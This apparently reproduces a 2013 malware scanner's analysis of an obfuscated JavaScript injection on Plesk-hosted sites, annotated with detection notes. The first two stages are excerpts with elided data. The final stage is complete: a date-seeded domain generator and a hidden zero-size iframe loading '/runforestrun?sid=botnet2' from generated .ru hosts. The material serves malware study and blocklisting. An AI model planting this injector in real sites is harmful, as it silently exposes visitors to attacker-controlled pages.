
Quttera web malware scanner API detected PLESK exploit JS

a guest
May 10th, 2013
  1. /*
  2.  * The Quttera web malware scanner API detected a malicious JavaScript threat that injects malicious iframes
  3.  * leading to previously hacked websites managed by the Plesk panel.
  4.  *
  5.  *
  6.  * The first level of obfuscation injects obfuscated JavaScript code that is then
  7.  * executed and injects the malicious iframes.
  8.  *
  9.  * The following code uses a fairly simple obfuscation technique: it generates a string
  10.  * from a list of character codes.
  11.  */
  12.  
  13. <script>
  /*
   * Stage 1 loader (excerpt: the paste elides the middle of the list with "...").
   * String.fromCharCode converts the decimal character codes to source text and
   * window.eval executes that text in the context of the infected page.
   * The visible codes spell the start and end of the stage 2 script shown further
   * down ("try{prototype%2;}catch(asd){x=2;}try{q=document[" ... "if(f)e(s);}").
   *
   * Detection note: the static pattern is eval applied directly to a long
   * String.fromCharCode(...) list inside an injected <script> element. Decode the
   * list to text offline for analysis; do not let it run in a browser.
   */
  14. /*km0ae9gr6m*/ // NOTE(review): presumably a marker left by the injector; the page does not say what it is for
  15. window.eval(String.fromCharCode(116, 114, 121, 123, 112, 114, 111, 116, 111, 116, 121, 112, 101, 37, 50, 59, 125, 99, 97, 116, 99, 104, 40, 97, 115, 100, 41, 123, 120, 61, 50, 59, 125, 116, 114, 121, 123, 113, 61, 100, 111, 99, 117, 109, 101, 110, 116, 91, 40, 120, 41, 63, 34, 99, 34, 43, 34, 114, 34, 58, 50, 43, 34, 101, 34, 43, 34, 97, 34, 43, 34, 116, 34, 43, 34, 101, 34, 43, 34, 69, 34, 43, 34, 108, 34, 43, 34, 101, 34, 43, 34, 109, 34, 43, 40, 40, 102, 41, 63, 34, 101, 34, 43, 34, 110, 34, ...
  16. 91, 102, 114, 43, 40, 40, 101, 41, 63, 34, 67, 111, 100, 101, 34, 58, 49, 50, 41, 93, 40, 40, 119, 91, 106, 93, 47, 40, 53, 43, 101, 40, 34, 106, 37, 50, 34, 41, 41, 41, 41, 59, 125, 10, 105, 102, 40, 102, 41, 101, 40, 115, 41, 59, 125, 10));
  17. </script>
  18.  
  19. /*
  20.  * The second level of obfuscation injects more complicated code that relies on exception handlers
  21.  * and initializes its variables only when execution follows the expected flow.
  22.  * The decoding procedure here
  23.  * is more complicated: "w[j] / (5 + eval('j%2'))" means that each element of the character array
  24.  * is divided by 5 or 6, depending on whether it sits at an even or an odd position in the array.
  25.  */
  26.  
  27. <script>
  /*
   * Stage 2 decoder (excerpt: the paste elides most of the array f with "...").
   * The decoder runs only inside catch handlers: each try block contains an
   * expression that throws, and the variables the decoder needs (x, fr, f, v) are
   * assigned in the matching catch. No variable is declared with var, so all of
   * them become implicit globals of the page.
   * NOTE(review): presumably this layout is meant to defeat analysers that do not
   * model exceptions or the DOM; the page only says the flow must be "correct".
   *
   * Decoding rule, as the loop below shows: character i = f[i] / 5 for even i and
   * f[i] / 6 for odd i (510/5 = 'f', 702/6 = 'u', 550/5 = 'n', ...). The result is
   * the stage 3 script listed after this block. For analysis, apply that division
   * offline and read the text; do not execute it.
   */
  28. try {
  29.     prototype % 2; // `prototype` is an undeclared identifier: throws unless the page defines such a global
  30. } catch (asd) {
  31.     x = 2; // flag consumed by the ternary on listing line 34
  32. }
  33. try {
  34.     q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p"); // with x truthy the ternary yields only "cr" (the + chain belongs to the else branch), so document["cr"] is not callable and this throws
  35.     q.appendChild(q + "");
  36. } catch (fwbewe) {
  37.     i = 0; // loop counter for the decoder below
  38.     try {
  39.         prototype * 5; // throws again so the assignments in the next catch run
  40.     } catch (z) {
  41.         fr = "fromChar"; // first half of "fromCharCode"; the second half is added on listing line 53
  42.         f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, ...
  43. 160, 192, 160, 192, 160, 192, 160, 192, 160, 600, 555, 594, 585, 654, 505, 660, 580, 276, 490, 666, 500, 726, 230, 582, 560, 672, 505, 660, 500, 402, 520, 630, 540, 600, 200, 630, 510, 684, 545, 246, 295, 60, 160, 192, 160, 192, 160, 192, 160, 192, 625, 60, 160, 192, 160, 192, 625, 594, 485, 696, 495, 624, 200, 606, 205, 738, 625, 60, 625, 264, 160, 318, 240, 288, 205, 354];
  44.         v = "eva"; // "eval" is split so the literal name never appears in the source
  45.     }
  46.     if (v) e = window[v + "l"]; // e becomes window["eval"]
  47.     w = f; // alias of the encoded array
  48.     s = []; // accumulator; turns into a string on the first "+" below
  49.     r = String;
  50.     z = ((e) ? "Code" : "");
  51.     for (; 1776 - 5 + 5 > i; i += 1) { // bound evaluates to 1776, which suggests the full array has 1776 entries
  52.         j = i; // copied to a global so the eval'd text "j%2" can read it
  53.         if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2")))); // String["fromCharCode"](w[j] / 5) for even j, / 6 for odd j
  54.     }
  55.     if (f) e(s); // executes the decoded stage 3 source
  56. }
  57. </script>
  58.  
  59.  
  60. /*
  61.  * Finally, the decoded threat generates hidden iframes pointing to random, previously hacked *.ru domains
  62.  */
  63. <script>
  /*
   * One step of the domain-generation PRNG. RandomNumberGenerator installs this
   * function as its .next method, so `this` is the generator object.
   * It updates this.seed from A, Q, R and M and returns seed * oneOverM.
   *
   * Note for analysts reproducing the output (for blocklists or sinkholing):
   * hi, lo and Q are computed with plain "/" and "%" and are never floored, so the
   * sequence is the result of double-precision arithmetic. A reimplementation must
   * use the same floating-point operations to yield the same hostnames.
   */
  64. function nextRandomNumber() {
  65.     var hi = this.seed / this.Q; // fractional value, no Math.floor
  66.     var lo = this.seed % this.Q;
  67.     var test = this.A * lo - this.R * hi;
  68.     if (test > 0) {
  69.         this.seed = test;
  70.     } else {
  71.         this.seed = test + this.M; // wrap a non-positive value by adding the modulus
  72.     }
  73.     return (this.seed * this.oneOverM); // seed scaled by 1/M
  74. }
  75.  
  /*
   * Constructor for the PRNG that drives hostname generation.
   *
   * unix: timestamp in seconds (multiplied by 1000 to build a Date).
   *
   * The seed uses only three values read from that Date through the local-time
   * getters: the month (getMonth), the day of the month (getDate) and a flag that
   * is 1 when getHours() > 12. The year, minutes and seconds do not enter the
   * seed, so for a given time zone the seed (and every hostname derived from it)
   * takes at most two values per calendar day. A defender can therefore enumerate
   * the hostnames for a date ahead of time.
   *
   * A = 48271 and M = 2147483647 are the multiplier and modulus of the
   * Park-Miller "minimal standard" generator; Q and R are derived without
   * flooring, see nextRandomNumber.
   */
  76. function RandomNumberGenerator(unix) {
  77.     var d = new Date(unix * 1000);
  78.     var s = d.getHours() > 12 ? 1 : 0; // half-day flag, flips when the local hour exceeds 12
  79.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
  80.     this.A = 48271;
  81.     this.M = 2147483647;
  82.     this.Q = this.M / this.A; // not floored
  83.     this.R = this.M % this.A;
  84.     this.oneOverM = 1.0 / this.M;
  85.     this.next = nextRandomNumber;
  86.     return this;
  87. }
  88.  
  /*
   * Maps the next PRNG output to an integer: Math.round((Max - Min) * r.next() + Min).
   * r is a generator object exposing .next(); Min and Max are the intended bounds.
   * NOTE(review): the result stays within [Min, Max] only if r.next() returns a
   * value in [0, 1]; the code here does not enforce that.
   */
  89. function createRandomNumber(r, Min, Max) {
  90.     return Math.round((Max - Min) * r.next() + Min);
  91. }
  92.  
  /*
   * Domain-generation routine: returns `length` lowercase letters a-z followed by
   * "." and `zone`.
   *
   * unix:   timestamp in seconds, passed to RandomNumberGenerator as the seed source.
   * length: number of letters in the generated label.
   * zone:   suffix appended after the dot (the caller below passes 'ru').
   *
   * No other source of randomness is used, so equal seeds give equal hostnames.
   * That determinism lets a defender compute the hostnames for a given date and
   * block or sinkhole them.
   */
  93. function generatePseudoRandomString(unix, length, zone) {
  94.     var rand = new RandomNumberGenerator(unix);
  95.     var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
  96.     var str = '';
  97.     for (var i = 0; i < length; i++) {
  98.         str += letters[createRandomNumber(rand, 0, letters.length - 1)]; // index 0..25 into the alphabet
  99.     }
  100.     return str + '.' + zone;
  101. }
  102.  
  /*
   * Payload trigger: 500 ms after the script loads, inserts one hidden iframe
   * whose host is generated from the visitor's current clock.
   *
   * Indicators visible in this code:
   *  - network: an http:// request to a 16-letter lowercase *.ru host with the
   *    path /runforestrun and the query string sid=botnet2;
   *  - DOM: a script-created IFRAME with 0px width, 0px height and
   *    visibility "hidden", appended to document.body;
   *  - page state: the implicit globals iframeWasCreated and ifrm.
   */
  103. setTimeout(function () {
  104.     try {
  105.         if (typeof iframeWasCreated == "undefined") { // run-once guard shared by every injected copy on the page
  106.             iframeWasCreated = true;
  107.             var unix = Math.round(+new Date() / 1000); // client clock, in seconds
  108.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
  109.             ifrm = document.createElement("IFRAME");
  110.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
  111.             ifrm.style.width = "0px";
  112.             ifrm.style.height = "0px";
  113.             ifrm.style.visibility = "hidden";
  114.             document.body.appendChild(ifrm);
  115.         }
  116.     } catch (e) {} // errors are discarded, so a failure leaves no console trace
  117. }, 500);
  118. </script>